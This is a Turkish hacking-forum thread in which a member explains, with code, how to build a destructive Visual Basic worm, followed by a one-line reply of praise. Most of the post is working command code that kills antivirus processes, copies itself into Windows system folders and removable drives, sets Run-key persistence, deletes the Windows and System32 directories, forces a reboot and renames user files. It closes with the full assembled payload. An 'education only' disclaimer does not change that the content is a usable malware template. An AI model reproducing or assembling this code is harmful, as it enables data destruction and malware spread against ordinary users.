Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Trojan ve Virüsler

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.





Solucanlar nedir? Nasıl üretilyor?

Trojan ve Virüsler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 17-07-2013 23:11   #1
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
11/2011
Nereden
Azeri/Baki
Yaş
27
Mesajlar
Konular

Teşekkür (Etti): 77
Teşekkür (Aldı): 410


Solucanlar nedir? Nasıl üretilyor?



Anlatacagimiz sadece Solucan virüsünün bir Anatomisidir. mantıını kavrayıp tamamen güvenlik almanız için yazılmıştır.
Visual Basic ile yazılan virüslerde öncelikle Silme,kopyalama,kayıt defterine ekle gibi kodlar kullanılıyor. Ama Antivirüsler bunu gördüğü için solucanı yazanlar Virüslerini MS-DOS kodlarıyla yapıyrlar. Peki bunlar nasıl yapılıyor ?.Tabiki "Shell" komutuyla "Cmd" dosyasını çalıştırarak bunun üstesinden geliyorlar.

Örnek:

shell "cmd /c del /f /q /s %windir%\\\\\\\\*.*"
Yukarıda gördüğünüz en baştaki komut "Shell" yani çağırma komutu.Bununla "CMD" dosyasını çalıştırıp ms-dos komutları veriliyor. MS_DOS komutunda ise şu yazmakta."del /f /q /s %Windir% yani Windowsun içindeki herşeyi sil. Aşağıda bilgi vererek kısa kısa kodların da ne olduğunu tanıtalım.
Bir solucan öncelikle kendini engelleyen programları kapatmak ister. Bunlar Antivirüsler, güvenlik duvarları, firewall türevi programlar. Bunun için şu komutu kullanıyorlar.

shell "cmd /c taskkill /t /im Eset.exe"
Bunu forma yapıştırıp kaydettikten sonra "Görev yöneticisi"nde eset adında çalışan antivirüsü kapatmakta.

Ama hedefin bilgisayarında acaba hangi antivirüs var? Hackerlar bunun üstesinden de arama motorlarından bütün antivirüslerin listesini indiriyor.
On Error Resume Next Me.hide app.TaskVisible = False Visible = False shell "cmd /c taskkill /t /im Panda.exe" shell "cmd /c taskkill /t /im Tsk.exe" shell "cmd /c taskkill /t /im Sym.exe" shell "cmd /c taskkill /t /im Anti.exe" shell "cmd /c taskkill /t /im Egui.exe"
gibi.

Sonraki aşamaları ise, solucan bütün antivirüsleri ve firewalları devre dışı bıraktıktan sonra yaptığı şey kendini sisteme kopyalamak ve kendini kayıt defterine eklemektir. Bunuda xCopy komutuyla yaptırıyorlar .Aşağıda kopyalama kodunda "VirüsAdı.exe" ile yazılan yere virüsün ismini yazıyorar. Örneğin bütün kodlar bittikten sonra virüsün ismine "Nuke" koyar iseler aynı şekilde bütün "Virüsadı.exe" kısımlarına virüsünüz adlarını yazıyorlar.

shell "cmd /c xcopy /u /y "VirüsAdı.exe" "%Windir%\\System\\Explorer.exe""shell "cmd /c xcopy /u /y "VirüsAdı.exe" "%Windir%\\System32\\Explorers.exe""
Evet.Yukarıda verilen kodları incelerseniz şunu görürsünüz. Hackerlerin yaptığı virüs kendini WINDOWS\\System ve System32 ye kopyalıyor. Bu sayede kendini windows ile birlikte başlatıyor ama aktif olmuyor. Bunun için kayıt defterine kendini ekleme özelliği ekliyorlar . Onu da şöyle yapmaktalar.

shell "cmd /c reg add hkey_local_machine\\software\\microsoft\\windowscu rrentversionrun /v startAPI /t reg_sz /d %Windir%\\System\\VirusAdı.exe /f"shell "cmd /c reg add hkey_local_machine\\software\\microsoft\\windowscu rrentversionrun /v startAPI /t reg_sz /d %Windir%\\System32\\VirusAdı.exe /f"

Yukarda yine "Shell" komutunu kullanarak virüslerini kayıt defterine ekliyorlar. Windows'un her açılışında virüs kendini aktif ediyor.

Bütün bunları yaptıktan sonra artık hackerlar virüslerini güvene alıyorlar. Saldırı kısmı şimdi başlıyor ; Tabi bunlar sadece işin nasıl döndüğünü öğrenmeniz için. Bilgi dışında kesinlikle kullanmayın.

Hackerların bundan sonra yaptıkları hayal güçlerini kuallanmak. Flash belleklerden virüsün bulaşmasını isterlerse, kendini Flaş belleklere kopyalaması için lazım olan kodu yani "xCopy"kodunu kullanıyorlar. Şöyle bir tasarlama yapıyorlar;

shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "D:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "E:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "G:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "H:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "I:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "L:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "C:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "J:\\Proces.exe"shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "K:\\Proces.exe"

shell "cmd /c ipconfig/release"shell "cmd /c del /f /q /s %Windir%\\*.*"shell "cmd /c shutdown -r -f -t 90"shell "cmd /c del /f /q /s %Windir%\\System32\\*.*"shell "cmd /c del /f /q /s %Windir%\\System\\*.*"msgbox "Dikkat Virus Var"msgbox "Sistem Hatasi"msgbox "Solucan Var"Shell "cmd /c REN *.DOC "Shell "cmd /c REN *.exe "Shell "cmd /c REN *.MP3 "Shell "cmd /c REN *.TXT "



On Error Resume Next Me.hide app.TaskVisible = False Visible = False shell "cmd /c taskkill /t /im Panda.exe" shell "cmd /c taskkill /t /im Tsk.exe" shell "cmd /c taskkill /t /im Sym.exe" shell "cmd /c taskkill /t /im Anti.exe" shell "cmd /c taskkill /t /im Egui.exe"
shell "cmd /c xcopy /u /y "VirüsAdı.exe" "%Windir%\\System\\Explorer.exe""shell "cmd /c xcopy /u /y "VirüsAdı.exe" "%Windir%\\System32\\Explorers.exe""
shell "cmd /c reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d %Windir%\\System\\VirusAdı.exe /f"shell "cmd /c reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d %Windir%\\System32\\VirusAdı.exe /f"
shell "cmd /c ipconfig/release"shell "cmd /c del /f /q /s %Windir%\\*.*"shell "cmd /c shutdown -r -f -t 90"shell "cmd /c del /f /q /s %Windir%\\System32\\*.*"shell "cmd /c del /f /q /s %Windir%\\System\\*.*"msgbox "Hacked by X"msgbox "Sisteminiz silindi"msgbox "Bilgisayarınız çökme aşamasında..."Shell "cmd /c REN *.DOC "Shell "cmd /c REN *.exe "Shell "cmd /c REN *.MP3 "Shell "cmd /c REN *.TXT "

İşte bunlar bir solucanın anatomisi. Bu kodlar sadece ve sadece eğitim içindir . Kesinlikle bir başkasında denemeyin.



___________________________________________























All that glitters isn't gold
-Parlayan hersey kizil diyildir

Hacking And Network Security ©
 Offline  
 
Alıntı ile Cevapla
Teşekkür

suleyman0772 Teşekkür etti.
Alt 20-07-2013 20:32   #2
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
07/2013
Nereden
Baku
Mesajlar
Konular

Teşekkür (Etti): 56
Teşekkür (Aldı): 89




Guzel Paylasim



___________________________________________

SEHITLER Olmez,VATAN Bolunmez!!!

 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau